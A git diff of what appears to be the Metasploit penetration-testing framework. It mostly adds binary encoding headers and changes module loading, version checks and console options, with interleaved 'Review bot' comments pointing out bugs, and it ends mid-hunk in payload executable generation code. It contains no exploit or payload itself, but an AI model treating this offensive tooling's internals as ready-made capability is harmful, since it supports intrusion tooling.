index 55395ff084..21ceae8079 100644
--- a/lib/msf/core/post/windows/registry.rb.ut.rb
+++ b/lib/msf/core/post/windows/registry.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..','..','..','..','..', 'lib'))
diff --git a/lib/msf/core/post/windows/services.rb b/lib/msf/core/post/windows/services.rb
index 363fb1f7b1..fc1339f9a9 100644
--- a/lib/msf/core/post/windows/services.rb
+++ b/lib/msf/core/post/windows/services.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/windows/registry'
module Msf
diff --git a/lib/msf/core/post/windows/shadowcopy.rb b/lib/msf/core/post/windows/shadowcopy.rb
index 6dd4dcd5f6..0f7dbc389a 100644
--- a/lib/msf/core/post/windows/shadowcopy.rb
+++ b/lib/msf/core/post/windows/shadowcopy.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/windows/services'
diff --git a/lib/msf/core/post/windows/user_profiles.rb b/lib/msf/core/post/windows/user_profiles.rb
index 0003fab29c..8f8a4817b8 100644
--- a/lib/msf/core/post/windows/user_profiles.rb
+++ b/lib/msf/core/post/windows/user_profiles.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/windows/registry'
require 'msf/core/post/windows/accounts'
diff --git a/lib/msf/core/post/windows/user_profiles.rb.ut.rb b/lib/msf/core/post/windows/user_profiles.rb.ut.rb
index c6d7c2a776..5ddb6ca2b6 100644
--- a/lib/msf/core/post/windows/user_profiles.rb.ut.rb
+++ b/lib/msf/core/post/windows/user_profiles.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..','..','..','..','..', 'lib'))
diff --git a/lib/msf/core/rpc.rb b/lib/msf/core/rpc.rb
index 8e352783f2..7558682bf2 100644
--- a/lib/msf/core/rpc.rb
+++ b/lib/msf/core/rpc.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "msf/core/rpc/service"
require "msf/core/rpc/client"
diff --git a/lib/msf/core/rpc/v10/client.rb b/lib/msf/core/rpc/v10/client.rb
index a3c60e32a8..144e3570df 100644
--- a/lib/msf/core/rpc/v10/client.rb
+++ b/lib/msf/core/rpc/v10/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'xmlrpc/client'
require 'msgpack'
diff --git a/lib/msf/core/rpc/v10/constants.rb b/lib/msf/core/rpc/v10/constants.rb
index 6aab513f07..5f4d2e4623 100644
--- a/lib/msf/core/rpc/v10/constants.rb
+++ b/lib/msf/core/rpc/v10/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module RPC
diff --git a/lib/msf/core/rpc/v10/rpc_auth.rb b/lib/msf/core/rpc/v10/rpc_auth.rb
index d9a76a8388..004692cbc1 100644
--- a/lib/msf/core/rpc/v10/rpc_auth.rb
+++ b/lib/msf/core/rpc/v10/rpc_auth.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module RPC
class RPC_Auth < RPC_Base
diff --git a/lib/msf/core/rpc/v10/rpc_base.rb b/lib/msf/core/rpc/v10/rpc_base.rb
index 2f90631195..ad3f8ec84a 100644
--- a/lib/msf/core/rpc/v10/rpc_base.rb
+++ b/lib/msf/core/rpc/v10/rpc_base.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module RPC
diff --git a/lib/msf/core/rpc/v10/rpc_console.rb b/lib/msf/core/rpc/v10/rpc_console.rb
index 78d1f5a8ea..43e6246b70 100644
--- a/lib/msf/core/rpc/v10/rpc_console.rb
+++ b/lib/msf/core/rpc/v10/rpc_console.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'pp'
require 'rex'
require 'msf/ui/web/driver'
diff --git a/lib/msf/core/rpc/v10/rpc_core.rb b/lib/msf/core/rpc/v10/rpc_core.rb
index e98783657d..2117fe4a1f 100644
--- a/lib/msf/core/rpc/v10/rpc_core.rb
+++ b/lib/msf/core/rpc/v10/rpc_core.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module RPC
class RPC_Core < RPC_Base
@@ -35,7 +36,7 @@ class RPC_Core < RPC_Base
end
def rpc_add_module_path(path)
- framework.modules.add_module_path(path, false)
+ framework.modules.add_module_path(path)
rpc_module_stats()
end
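Review bot: `rpc_add_module_path` discards the result of `add_module_path(path)` and returns `rpc_module_stats()` regardless, so an RPC client cannot tell a path that loaded modules from one that loaded none. The console caller in command_dispatcher/core.rb does check that return value (`if (counts = ...)`). The method also has no comment, and since `path` comes from the RPC caller and names a directory that modules are loaded from, it deserves one, for example `# Adds a caller-supplied directory to the module search path and returns the updated module stats`.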
diff --git a/lib/msf/core/rpc/v10/rpc_db.rb b/lib/msf/core/rpc/v10/rpc_db.rb
index 0556ca9149..7701b5ae07 100644
--- a/lib/msf/core/rpc/v10/rpc_db.rb
+++ b/lib/msf/core/rpc/v10/rpc_db.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module RPC
class RPC_Db < RPC_Base
diff --git a/lib/msf/core/rpc/v10/rpc_job.rb b/lib/msf/core/rpc/v10/rpc_job.rb
index 7862a81596..7b0c74427f 100644
--- a/lib/msf/core/rpc/v10/rpc_job.rb
+++ b/lib/msf/core/rpc/v10/rpc_job.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module RPC
class RPC_Job < RPC_Base
diff --git a/lib/msf/core/rpc/v10/rpc_module.rb b/lib/msf/core/rpc/v10/rpc_module.rb
index 876aab0534..0a112be7f7 100644
--- a/lib/msf/core/rpc/v10/rpc_module.rb
+++ b/lib/msf/core/rpc/v10/rpc_module.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: module.rb 12624 2011-05-15 23:51:53Z hdm $
##
diff --git a/lib/msf/core/rpc/v10/rpc_plugin.rb b/lib/msf/core/rpc/v10/rpc_plugin.rb
index e5493e2db2..723e67e58e 100644
--- a/lib/msf/core/rpc/v10/rpc_plugin.rb
+++ b/lib/msf/core/rpc/v10/rpc_plugin.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module RPC
class RPC_Plugin < RPC_Base
diff --git a/lib/msf/core/rpc/v10/rpc_session.rb b/lib/msf/core/rpc/v10/rpc_session.rb
index 8d108eeeea..25aa49fc82 100644
--- a/lib/msf/core/rpc/v10/rpc_session.rb
+++ b/lib/msf/core/rpc/v10/rpc_session.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex'
require 'rex/ui/text/output/buffer'
diff --git a/lib/msf/core/rpc/v10/service.rb b/lib/msf/core/rpc/v10/service.rb
index b2c71e62ed..3ff567ec67 100644
--- a/lib/msf/core/rpc/v10/service.rb
+++ b/lib/msf/core/rpc/v10/service.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msgpack'
require 'rex'
diff --git a/lib/msf/core/session.rb b/lib/msf/core/session.rb
index de7bd44c04..4f3e025e73 100644
--- a/lib/msf/core/session.rb
+++ b/lib/msf/core/session.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
module Msf
diff --git a/lib/msf/core/session/basic.rb b/lib/msf/core/session/basic.rb
index 369a0f1007..f9ec9370d0 100644
--- a/lib/msf/core/session/basic.rb
+++ b/lib/msf/core/session/basic.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Session
diff --git a/lib/msf/core/session/comm.rb b/lib/msf/core/session/comm.rb
index b4942d363d..a0dffdca1a 100644
--- a/lib/msf/core/session/comm.rb
+++ b/lib/msf/core/session/comm.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
module Msf
diff --git a/lib/msf/core/session/interactive.rb b/lib/msf/core/session/interactive.rb
index ac96fe2f28..92bc085f13 100644
--- a/lib/msf/core/session/interactive.rb
+++ b/lib/msf/core/session/interactive.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
require 'rex/io/ring_buffer'
diff --git a/lib/msf/core/session/netware_console.rb b/lib/msf/core/session/netware_console.rb
index 8372a2a748..73bc189392 100644
--- a/lib/msf/core/session/netware_console.rb
+++ b/lib/msf/core/session/netware_console.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/base'
module Msf
diff --git a/lib/msf/core/session/provider/multi_command_execution.rb b/lib/msf/core/session/provider/multi_command_execution.rb
index 77823a5b89..566194b1c3 100644
--- a/lib/msf/core/session/provider/multi_command_execution.rb
+++ b/lib/msf/core/session/provider/multi_command_execution.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Session
module Provider
diff --git a/lib/msf/core/session/provider/multi_command_shell.rb b/lib/msf/core/session/provider/multi_command_shell.rb
index 1f8369dc67..f7423cdb6c 100644
--- a/lib/msf/core/session/provider/multi_command_shell.rb
+++ b/lib/msf/core/session/provider/multi_command_shell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Session
module Provider
diff --git a/lib/msf/core/session/provider/single_command_execution.rb b/lib/msf/core/session/provider/single_command_execution.rb
index 7da90f9f3c..23d700faa2 100644
--- a/lib/msf/core/session/provider/single_command_execution.rb
+++ b/lib/msf/core/session/provider/single_command_execution.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Session
module Provider
diff --git a/lib/msf/core/session/provider/single_command_shell.rb b/lib/msf/core/session/provider/single_command_shell.rb
index 5997b3de7b..bac23b5bed 100644
--- a/lib/msf/core/session/provider/single_command_shell.rb
+++ b/lib/msf/core/session/provider/single_command_shell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Session
module Provider
diff --git a/lib/msf/core/session_manager.rb b/lib/msf/core/session_manager.rb
index 4e3e753958..3b75ce8c37 100644
--- a/lib/msf/core/session_manager.rb
+++ b/lib/msf/core/session_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'thread'
module Msf
@@ -229,7 +230,7 @@ class SessionManager < Hash
framework.events.on_session_open(session)
rescue ::Exception => e
wlog("Exception in on_session_open event handler: #{e.class}: #{e}")
- wlog("Call Stack\n#{e.backtrace.join("\n")}", 'core', LEV_3)
+ wlog("Call Stack\n#{e.backtrace.join("\n")}")
end
if session.respond_to?("console")
diff --git a/lib/msf/core/session_manager.rb.ut.rb b/lib/msf/core/session_manager.rb.ut.rb
index 1b604e2ffd..63d9cbfde6 100644
--- a/lib/msf/core/session_manager.rb.ut.rb
+++ b/lib/msf/core/session_manager.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/msf/core/task_manager.rb b/lib/msf/core/task_manager.rb
index 6c2db60e35..089cf2613c 100644
--- a/lib/msf/core/task_manager.rb
+++ b/lib/msf/core/task_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/thread_manager.rb b/lib/msf/core/thread_manager.rb
index 94bbad8bac..42ea49059a 100644
--- a/lib/msf/core/thread_manager.rb
+++ b/lib/msf/core/thread_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/plugin'
=begin
diff --git a/lib/msf/env/gemcache.rb b/lib/msf/env/gemcache.rb
index 1845d2e4c3..eedd7f7bfe 100644
--- a/lib/msf/env/gemcache.rb
+++ b/lib/msf/env/gemcache.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# This handles gem requirements for bundled installer environments
#
diff --git a/lib/msf/events.rb b/lib/msf/events.rb
index bb5314bed8..5238553786 100644
--- a/lib/msf/events.rb
+++ b/lib/msf/events.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module UiEventSubscriber
diff --git a/lib/msf/sanity.rb b/lib/msf/sanity.rb
index 5fd91ccdb0..84d2bece5a 100644
--- a/lib/msf/sanity.rb
+++ b/lib/msf/sanity.rb
@@ -1,8 +1,8 @@
+# -*- coding: binary -*-
#
# Provides some sanity checks against the ruby build and version
#
-
# Check for the broken pack/unpack in OS X 10.4.x
if ([1].pack('n') == "\x01\x00")
$stderr.puts "*** This ruby build has a broken pack/unpack implementation! "
@@ -18,16 +18,21 @@ end
# Check for ruby 1.8.2 as the minimal supported version
if (RUBY_VERSION =~ /^1\.[0-7]\./ or RUBY_VERSION =~ /^1\.8\.[0-1]$/)
- $stderr.puts "*** This version of ruby is not supported, please upgrade to 1.8.2+"
+ $stderr.puts "*** This version of ruby is not supported, please upgrade to 1.8.7+"
exit(0)
end
# Check for ruby 1.9.0 and throw a big nasty warning
if (RUBY_VERSION =~ /^1\.9\.0/)
- $stderr.puts "*** Ruby 1.9.0 is not supported, please upgrade to Ruby 1.9.1 or newer."
+ $stderr.puts "*** Ruby 1.9.0 is not supported, please upgrade to Ruby 1.9.3 or newer."
exit(0)
end
+# Check for ruby 1.9.1 and throw a warning
+if (RUBY_VERSION =~ /^1\.9\.1/)
+ $stderr.puts "*** Ruby 1.9.1 is not supported, please upgrade to Ruby 1.9.3 or newer."
+end
+
if(RUBY_VERSION =~ /^(1\.9|2\.0)\./)
# Load rubygems before changing default_internal, otherwise we may get
# Encoding::UndefinedConversionError as the gemspec files are loaded
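Review bot: The 1.8 check still lets 1.8.2 through 1.8.6 pass even though the new message says 1.8.7+ is required: the condition is unchanged at `RUBY_VERSION =~ /^1\.8\.[0-1]$/` and the comment above it still names 1.8.2 as the minimum. If 1.8.7 is the real floor, the condition should read `RUBY_VERSION =~ /^1\.8\.[0-6]$/` and the comment `# Check for ruby 1.8.7 as the minimal supported version`. The 1.9 checks have the same gap: the messages name 1.9.3, yet 1.9.2 is not flagged. The new 1.9.1 branch also prints "not supported" but keeps loading, unlike the 1.9.0 branch, which exits. The final `if(RUBY_VERSION =~ /^(1\.9|2\.0)\./)` block continues outside the hunk.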
diff --git a/lib/msf/scripts/meterpreter.rb b/lib/msf/scripts/meterpreter.rb
index 388fe363b7..87141b72e9 100644
--- a/lib/msf/scripts/meterpreter.rb
+++ b/lib/msf/scripts/meterpreter.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/scripts/meterpreter/common'
require 'msf/scripts/meterpreter/registry'
require 'msf/scripts/meterpreter/file'
diff --git a/lib/msf/scripts/meterpreter/accounts.rb b/lib/msf/scripts/meterpreter/accounts.rb
index bf819e4090..78c559324a 100644
--- a/lib/msf/scripts/meterpreter/accounts.rb
+++ b/lib/msf/scripts/meterpreter/accounts.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/windows/accounts'
module Msf
diff --git a/lib/msf/scripts/meterpreter/common.rb b/lib/msf/scripts/meterpreter/common.rb
index 3f75ca8218..b2d5bd9464 100644
--- a/lib/msf/scripts/meterpreter/common.rb
+++ b/lib/msf/scripts/meterpreter/common.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/common'
require 'msf/core/post/windows/eventlog'
require 'msf/core/post/windows/priv'
diff --git a/lib/msf/scripts/meterpreter/file.rb b/lib/msf/scripts/meterpreter/file.rb
index be58b460fb..06a83db993 100644
--- a/lib/msf/scripts/meterpreter/file.rb
+++ b/lib/msf/scripts/meterpreter/file.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/file'
module Msf
diff --git a/lib/msf/scripts/meterpreter/registry.rb b/lib/msf/scripts/meterpreter/registry.rb
index 8b095d1abe..0150a87f7d 100644
--- a/lib/msf/scripts/meterpreter/registry.rb
+++ b/lib/msf/scripts/meterpreter/registry.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/windows/registry'
module Msf
diff --git a/lib/msf/scripts/meterpreter/services.rb b/lib/msf/scripts/meterpreter/services.rb
index ea640a4f42..2585161af1 100644
--- a/lib/msf/scripts/meterpreter/services.rb
+++ b/lib/msf/scripts/meterpreter/services.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core/post/windows/services'
module Msf
diff --git a/lib/msf/ui.rb b/lib/msf/ui.rb
index 09e77933f0..de75c092ee 100644
--- a/lib/msf/ui.rb
+++ b/lib/msf/ui.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
end
diff --git a/lib/msf/ui/banner.rb b/lib/msf/ui/banner.rb
index 933912a100..04d5ac2e07 100644
--- a/lib/msf/ui/banner.rb
+++ b/lib/msf/ui/banner.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
diff --git a/lib/msf/ui/common.rb b/lib/msf/ui/common.rb
index 65422eb96e..2f15755946 100644
--- a/lib/msf/ui/common.rb
+++ b/lib/msf/ui/common.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
@@ -19,7 +20,7 @@ class Common
# Add an additional module search path
when "modulepath"
# Don't affect the module cache by us loading these modules
- framework.modules.add_module_path(val, false)
+ framework.modules.add_module_path(val)
true
else
false
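Review bot: The comment `# Don't affect the module cache by us loading these modules` no longer describes the call beneath it, because the `false` argument it presumably referred to is gone and `add_module_path(val)` now runs with the method's default. Reword it, for example `# Load modules from the additional search path`, or drop it. The same applies to `# Load modules, but do not consult the cache` in the `@@ -1232,7 +1233,7 @@` hunk of command_dispatcher/core.rb. The surrounding `case` starts outside this hunk.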
diff --git a/lib/msf/ui/console.rb b/lib/msf/ui/console.rb
index 972af0e376..d90d4d30e5 100644
--- a/lib/msf/ui/console.rb
+++ b/lib/msf/ui/console.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Console
diff --git a/lib/msf/ui/console/command_dispatcher.rb b/lib/msf/ui/console/command_dispatcher.rb
index 9fb1741043..b3f29245a5 100644
--- a/lib/msf/ui/console/command_dispatcher.rb
+++ b/lib/msf/ui/console/command_dispatcher.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
diff --git a/lib/msf/ui/console/command_dispatcher/auxiliary.rb b/lib/msf/ui/console/command_dispatcher/auxiliary.rb
index 015ca29e82..096e0643ec 100644
--- a/lib/msf/ui/console/command_dispatcher/auxiliary.rb
+++ b/lib/msf/ui/console/command_dispatcher/auxiliary.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Console
@@ -110,6 +111,11 @@ class Auxiliary
)
rescue ::Timeout::Error
print_error("Auxiliary triggered a timeout exception")
+ print_error("Call stack:")
+ e.backtrace.each do |line|
+ break if line =~ /lib.msf.base.simple/
+ print_error(" #{line}")
+ end
rescue ::Interrupt
print_error("Auxiliary interrupted by the console user")
rescue ::Exception => e
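Review bot: The new backtrace loop reads `e`, but this clause is `rescue ::Timeout::Error` with no `=> e`. Unless `e` is assigned earlier in the method (outside this hunk), the handler itself would raise when a timeout occurs, and the call stack would never be printed. Bind the exception on the rescue line: `rescue ::Timeout::Error => e`. The `begin` this clause belongs to starts outside the hunk.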
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index 40c160693d..3acc2b3b32 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/ui/console/command_dispatcher/encoder'
require 'msf/ui/console/command_dispatcher/exploit'
require 'msf/ui/console/command_dispatcher/nop'
@@ -1232,7 +1233,7 @@ class Core
curr_path = path
# Load modules, but do not consult the cache
- if (counts = framework.modules.add_module_path(path, false))
+ if (counts = framework.modules.add_module_path(path))
counts.each_pair { |type, count|
totals[type] = (totals[type]) ? (totals[type] + count) : count
@@ -1703,6 +1704,14 @@ class Core
global = true
end
+ # Decide if this is an append operation
+ append = false
+
+ if (args[0] == '-a')
+ args.shift
+ append = true
+ end
+
# Determine which data store we're operating on
if (active_module and global == false)
datastore = active_module.datastore
@@ -1760,9 +1769,13 @@ class Core
return true
end
- datastore[name] = value
+ if append
+ datastore[name] = datastore[name] + value
+ else
+ datastore[name] = value
+ end
- print_line("#{name} => #{value}")
+ print_line("#{name} => #{datastore[name]}")
end
#
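Review bot: `datastore[name] + value` in the append branch fails when the option has no current value. If `datastore[name]` returns nil for an unset key (the datastore class is not visible here), `set -a` raises NoMethodError instead of setting the option. Fall back to an empty string with `datastore[name] = datastore[name].to_s + value`, or reject the append with `print_error`. The `-a` flag parsed in the `@@ -1703,6 +1704,14 @@` hunk is only recognised at `args[0]` after the global-flag check, and neither hunk shows the command's usage text being updated to mention it. The method body starts and ends outside both hunks.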
@@ -2278,7 +2291,7 @@ class Core
# Returns the revision of the framework and console library
#
def cmd_version(*args)
- svn_console_version = "$Revision: 14065 $"
+ svn_console_version = "$Revision: 15168 $"
svn_metasploit_version = Msf::Framework::Revision.match(/ (.+?) \$/)[1] rescue nil
if svn_metasploit_version
print_line("Framework: #{Msf::Framework::Version}.#{svn_metasploit_version}")
diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb
index e687c02b16..6feb9a6249 100644
--- a/lib/msf/ui/console/command_dispatcher/db.rb
+++ b/lib/msf/ui/console/command_dispatcher/db.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rexml/document'
require 'rex/parser/nmap_xml'
diff --git a/lib/msf/ui/console/command_dispatcher/encoder.rb b/lib/msf/ui/console/command_dispatcher/encoder.rb
index 7bf4e68090..b71e3216d5 100644
--- a/lib/msf/ui/console/command_dispatcher/encoder.rb
+++ b/lib/msf/ui/console/command_dispatcher/encoder.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Console
diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb
index 69eb859507..9398558764 100644
--- a/lib/msf/ui/console/command_dispatcher/exploit.rb
+++ b/lib/msf/ui/console/command_dispatcher/exploit.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Console
diff --git a/lib/msf/ui/console/command_dispatcher/nop.rb b/lib/msf/ui/console/command_dispatcher/nop.rb
index 9f5d66e113..de306027de 100644
--- a/lib/msf/ui/console/command_dispatcher/nop.rb
+++ b/lib/msf/ui/console/command_dispatcher/nop.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/parser/arguments'
module Msf
diff --git a/lib/msf/ui/console/command_dispatcher/payload.rb b/lib/msf/ui/console/command_dispatcher/payload.rb
index dd1430db7e..c3449fc484 100644
--- a/lib/msf/ui/console/command_dispatcher/payload.rb
+++ b/lib/msf/ui/console/command_dispatcher/payload.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/ui/console/command_dispatcher/post.rb b/lib/msf/ui/console/command_dispatcher/post.rb
index b2f66977a3..d61864e924 100644
--- a/lib/msf/ui/console/command_dispatcher/post.rb
+++ b/lib/msf/ui/console/command_dispatcher/post.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Console
diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb
index c82ed28bcb..399c0781c2 100644
--- a/lib/msf/ui/console/driver.rb
+++ b/lib/msf/ui/console/driver.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/core'
require 'msf/base'
require 'msf/ui'
@@ -139,7 +140,6 @@ class Driver < Msf::Ui::Driver
print_error("***")
end
-
begin
require 'openssl'
rescue ::LoadError
@@ -155,12 +155,6 @@ class Driver < Msf::Ui::Driver
# Re-enable output
self.disable_output = false
- # Load additional modules as necessary
- self.framework.modules.add_module_path(opts['ModulePath'], false) if opts['ModulePath']
-
- # Load console-specific configuration
- load_config(opts['Config'])
-
# Whether or not command passthru should be allowed
self.command_passthru = (opts['AllowCommandPassthru'] == false) ? false : true
@@ -215,11 +209,33 @@ class Driver < Msf::Ui::Driver
end
print_error("Failed to connect to the database: #{framework.db.error} #{db.inspect} #{framework.db.error.backtrace}")
+ else
+ self.framework.modules.refresh_cache
+ if self.framework.modules.cache.keys.length == 0
+ print_status("The initial module cache will be built in the background, this can take 2-5 minutes...")
+ end
end
end
end
end
+ # Initialize the module paths only if we didn't get passed a Framework instance
+ unless opts['Framework']
+ # Configure the framework module paths
+ self.framework.init_module_paths
+ self.framework.modules.add_module_path(opts['ModulePath']) if opts['ModulePath']
+
+ # Rebuild the module cache in a background thread
+ self.framework.threads.spawn("ModuleCacheRebuild", true) do
+ self.framework.cache_thread = Thread.current
+ self.framework.modules.rebuild_cache
+ self.framework.cache_initialized = true
+ self.framework.cache_thread = nil
+ end
+ end
+
+ # Load console-specific configuration (after module paths are added)
+ load_config(opts['Config'])
# Process things before we actually display the prompt and get rocking
on_startup(opts)
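Review bot: The `ModuleCacheRebuild` thread clears `cache_thread` and sets `cache_initialized` only on the success path. If `rebuild_cache` raises, `framework.cache_thread` keeps pointing at a finished thread, and any code that polls these two fields (none is visible here) sees a rebuild that never completes. Put the reset in an `ensure`: wrap the `rebuild_cache` and `cache_initialized = true` lines in `begin`, and close with `ensure`, `self.framework.cache_thread = nil`, `end`. `cache.keys.length == 0` can also be written `cache.empty?`, assuming `cache` is a Hash. The enclosing initializer starts and ends outside the hunk.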
diff --git a/lib/msf/ui/console/framework_event_manager.rb b/lib/msf/ui/console/framework_event_manager.rb
index 40d0e8f618..9adb2e6944 100644
--- a/lib/msf/ui/console/framework_event_manager.rb
+++ b/lib/msf/ui/console/framework_event_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Console
diff --git a/lib/msf/ui/console/module_command_dispatcher.rb b/lib/msf/ui/console/module_command_dispatcher.rb
index 95250e823d..8337bbb0b9 100644
--- a/lib/msf/ui/console/module_command_dispatcher.rb
+++ b/lib/msf/ui/console/module_command_dispatcher.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'msf/ui/console/command_dispatcher'
module Msf
diff --git a/lib/msf/ui/console/table.rb b/lib/msf/ui/console/table.rb
index f95be6a433..92f9673cb0 100644
--- a/lib/msf/ui/console/table.rb
+++ b/lib/msf/ui/console/table.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
diff --git a/lib/msf/ui/driver.rb b/lib/msf/ui/driver.rb
index 293c226cac..02f3daea8d 100644
--- a/lib/msf/ui/driver.rb
+++ b/lib/msf/ui/driver.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
diff --git a/lib/msf/ui/web.rb b/lib/msf/ui/web.rb
index d9e294aeba..4b33298f2b 100644
--- a/lib/msf/ui/web.rb
+++ b/lib/msf/ui/web.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Web
diff --git a/lib/msf/ui/web/comm.rb b/lib/msf/ui/web/comm.rb
index 91bc2dfe0d..2e3d2d2c96 100644
--- a/lib/msf/ui/web/comm.rb
+++ b/lib/msf/ui/web/comm.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Web
diff --git a/lib/msf/ui/web/console.rb b/lib/msf/ui/web/console.rb
index 0cfc78aecc..17dadcdecd 100644
--- a/lib/msf/ui/web/console.rb
+++ b/lib/msf/ui/web/console.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
module Ui
module Web
@@ -46,6 +47,11 @@ class WebConsole
# Create a read subscriber
self.pipe.create_subscriber('msfweb')
+ # Skip database initialization if it is already configured
+ if framework.db and framework.db.usable and framework.db.migrated
+ opts['SkipDatabaseInit'] = true
+ end
+
# Initialize the console with our pipe
self.console = Msf::Ui::Console::Driver.new(
'msf',
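Review bot: The added `opts['SkipDatabaseInit'] = true` writes into the `opts` hash in place, so if the caller reuses that hash (its origin is outside this hunk) the flag could persist beyond this console instance. A local copy avoids the side effect: `opts = opts.merge('SkipDatabaseInit' => true)`. The condition also uses the low-precedence `and`; `framework.db && framework.db.usable && framework.db.migrated` is the safer form. The comment says "already configured" while the test is "usable and migrated", and it would help to say so in the comment. The enclosing method starts and ends outside the hunk.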
diff --git a/lib/msf/ui/web/driver.rb b/lib/msf/ui/web/driver.rb
index e5514394a5..9d7790d3b2 100644
--- a/lib/msf/ui/web/driver.rb
+++ b/lib/msf/ui/web/driver.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/proto/http'
require 'msf/core'
require 'msf/base'
diff --git a/lib/msf/util.rb b/lib/msf/util.rb
index 9a13a906c9..6ce2bdd01e 100644
--- a/lib/msf/util.rb
+++ b/lib/msf/util.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# framework-util
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 498610b721..5d6c0e509a 100755
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id: exe.rb 14286 2011-11-20 01:41:04Z rapid7 $
##
@@ -1870,12 +1871,20 @@ End Sub
end
when 'elf'
- if (not arch or (arch.index(ARCH_X86)))
- output = Msf::Util::EXE.to_linux_x86_elf(framework, code, exeopts)
- end
-
- if (arch and (arch.index( ARCH_X86_64 ) or arch.index( ARCH_X64 )))
- output = Msf::Util::EXE.to_linux_x64_elf(framework, code, exeopts)
+ if (not plat or (plat.index(Msf::Module::Platform::Linux)))
+ if (not arch or (arch.index(ARCH_X86)))
